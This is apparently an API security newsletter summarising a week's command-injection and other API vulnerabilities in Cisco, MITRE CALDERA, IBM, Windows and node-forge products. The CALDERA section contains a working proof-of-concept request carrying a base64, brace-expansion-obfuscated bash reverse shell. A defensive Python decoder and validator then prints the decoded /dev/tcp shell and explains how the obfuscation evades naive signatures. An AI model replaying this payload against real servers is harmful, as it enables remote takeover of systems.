ApiSec: The week of Jan 10th, 2022. CISCO, MSFT, IBM, MITRE and NodeJS. The week of command injections.
CISCO Tetration API root-level command injection
A vulnerability in the web-based management interface and in the API subsystem of Cisco Tetration could allow an authenticated, remote attacker to inject arbitrary commands to be executed with root-level privileges on the underlying operating system.
This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by submitting a crafted HTTP message to the affected system. A successful exploit could allow the attacker to execute commands with root-level privileges. To exploit this vulnerability, an attacker would need valid administrator-level credentials.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Source: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tetr-cmd-injc-skrwGO
MITRE Caldera Command Injection Via Configurations. CVE-2021-42559
An issue was discovered in CALDERA 2.8.1. It contains multiple startup “requirements” that execute commands when starting the server. Because these commands can be changed via the REST API, an authenticated user can insert arbitrary commands that will execute when the server is restarted.
The exploit is trivial: an OS command placed in the JSON API request body, in the value->go->command parameter. The base64 blob below decodes to a bash reverse shell to 127.0.0.1:4444, and the {echo,...}|{base64,-d}|{bash,-i} form uses bash brace expansion so the pipeline contains no literal spaces:
POST /api/rest HTTP/1.
Host: 192.168.243.180:8888
Content-Type: application/json
Content-Length: 307
Cookie: API_SESSION="gAAAAABfkzOeJGqWz0pgDyaZ16BdFmuQzOenIthJ6XI9pgdt38mOPFYVv1ghN3NOjo5ZAEv934xzRKXehT35Msve_JHBMaPMyFY2JAFtYtCoU6jGLC7Bz8XBAoH9SArDdi3oTSVkAMl7rRu17YM-O6QBqO81XZya_g=="
{"index":"configuration","prop":"requirements","value":{"go": {"command": "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}", "type": "installed_program", "version": 1.11}, "python": {"attr": "version", "module": "sys", "type": "python_module", "version": "3.6.1"}}}
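As an added example (not part of the newsletter or of the CALDERA project), the script below takes a request body of the same shape as the PoC above, undoes the brace-expansion obfuscation to show the command the server would actually run, decodes the base64 stage, and then applies the check a hardened server should perform before storing a "requirements" update: reject any installed_program command that carries shell syntax or names a binary outside an allowlist, and run the survivors as an argv list without a shell. The request body, the allowlist and the function names are assumptions made for illustration.

```python
import base64
import json
import re
import shlex
from typing import Dict, Optional, Tuple

# Constructed request body mirroring the shape of the published PoC body
# (a "requirements" object; CALDERA runs each entry's "command" at startup).
PAYLOAD_B64 = "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx"
REQUEST_BODY = json.dumps({
    "index": "configuration",
    "prop": "requirements",
    "value": {
        "go": {
            "command": "bash -c {echo,%s}|{base64,-d}|{bash,-i}" % PAYLOAD_B64,
            "type": "installed_program",
            "version": 1.11,
        },
        "python": {"attr": "version", "module": "sys",
                   "type": "python_module", "version": "3.6.1"},
    },
})


def poc_command() -> str:
    """The value->go->command string from the constructed body."""
    return json.loads(REQUEST_BODY)["value"]["go"]["command"]


# Bash brace expansion: {echo,X} expands to "echo X", so the attacker's
# pipeline contains no literal spaces. Rewrite such lists back to
# space-separated words so the command reads the way bash will run it.
BRACE_LIST = re.compile(r"\{([^{}\s]*,[^{}\s]*)\}")


def expand_braces(cmd: str) -> str:
    return BRACE_LIST.sub(lambda m: m.group(1).replace(",", " "), cmd)


# Pull the base64 operand of the first "echo X | base64 -d" stage and decode it.
B64_STAGE = re.compile(r"echo ([A-Za-z0-9+/=]+)\s*\|\s*base64 -d")


def decode_echo_base64(cmd: str) -> Optional[str]:
    m = B64_STAGE.search(expand_braces(cmd))
    return base64.b64decode(m.group(1)).decode() if m else None


# Hardened check (assumed allowlist, not CALDERA's own): an installed_program
# requirement may only name one of a fixed set of binaries and may not carry
# shell syntax. Execute the result with subprocess.run(argv) (shell=False).
ALLOWED_BINARIES = {"go", "python3", "python"}
SHELL_META = set("|&;<>$`(){}")


def validate_requirement(name: str, req: dict) -> Tuple[bool, str]:
    if req.get("type") != "installed_program":
        return True, f"{name}: not a command-based requirement"
    cmd = req.get("command", "")
    if any(ch in SHELL_META for ch in cmd):
        return False, f"{name}: shell metacharacters in command"
    argv = shlex.split(cmd)
    if not argv or argv[0] not in ALLOWED_BINARIES:
        return False, f"{name}: binary {argv[:1]} not in allowlist"
    return True, f"{name}: ok -> {argv}"


def review_request(body: str) -> Dict[str, Tuple[bool, str]]:
    """Validate every requirement in a configuration update before storing it."""
    doc = json.loads(body)
    if doc.get("index") != "configuration" or doc.get("prop") != "requirements":
        return {}
    return {name: validate_requirement(name, req) for name, req in doc["value"].items()}


if __name__ == "__main__":
    cmd = poc_command()
    print("expanded :", expand_braces(cmd))
    print("decoded  :", decode_echo_base64(cmd))
    for name, (ok, why) in review_request(REQUEST_BODY).items():
        print("ACCEPT" if ok else "REJECT", why)
```

The decoded stage is the familiar `bash -i >& /dev/tcp/127.0.0.1/4444 0>&1`; the brace-expansion trick matters for detection because a naive signature looking for `base64 -d` or `bash -i` with spaces never sees the original string. The validator rejects the PoC entry on metacharacters alone, before the allowlist is even consulted, while a plain `go version` passes.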
IBM Planning Analytics 2.0 and IBM Planning Analytics Workspace 2.0 DQM. CVE-2021-38892
The IBM APIs allow all control requests to be submitted in unauthenticated sessions. A remote threat actor who can reach a valid PA endpoint, without prior authentication, can therefore read and write files on the IBM Planning Analytics system. Depending on file system permissions this extends to path traversal and possibly remote code execution. IBM X-Force ID: 209511.
Windows Security Center API Remote Code Execution Vulnerability. CVE-2022-21874
We don't know much, but this is nuts!
CVE-2022-21874 is a publicly disclosed RCE in the Windows Security Center API that received a CVSSv3 score of 7.8. It was discovered by Jinquan with DBAPPSecurity Lieying Lab. This vulnerability requires user interaction to exploit and the attack vector is local.
Node-forge Prototype Pollution
The forge.debug API had a potential prototype pollution issue if called with untrusted input. The API was only used for internal debug purposes in a safe way and was never documented or advertised. It is suspected that uses of this API, if any exist, would likely not have used untrusted inputs in a vulnerable way.
(3 years ago) Thanks Ivan for this latest edition of the API Security newsletter. Great reporting, as always.